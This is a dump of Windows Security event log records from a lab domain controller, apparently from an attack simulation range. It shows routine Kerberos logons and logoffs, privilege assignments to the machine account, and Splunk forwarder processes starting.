Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726EE7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263571
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726E7B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263570
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x726E7B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59842
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263569
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726E7B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:12:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263577
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x727CAA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:12:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263576
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x727CAA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59851
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:12:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263575
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x727CAA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:13:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263578
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263580
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263579
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x161c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263581
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263582
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x169c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263584
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263583
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:13:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263587
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72B848
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:13:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263586
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72B848
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59865
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:13:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263585
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72B848
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263598
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BC84
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263597
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BD72
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263596
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BDBA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263595
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BE2C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59870
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263594
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BE2C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263593
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BDBA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 59869
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263592
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BDBA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263591
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BD72
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263590
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BD72
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:14:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263589
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x72BC84
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59868
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
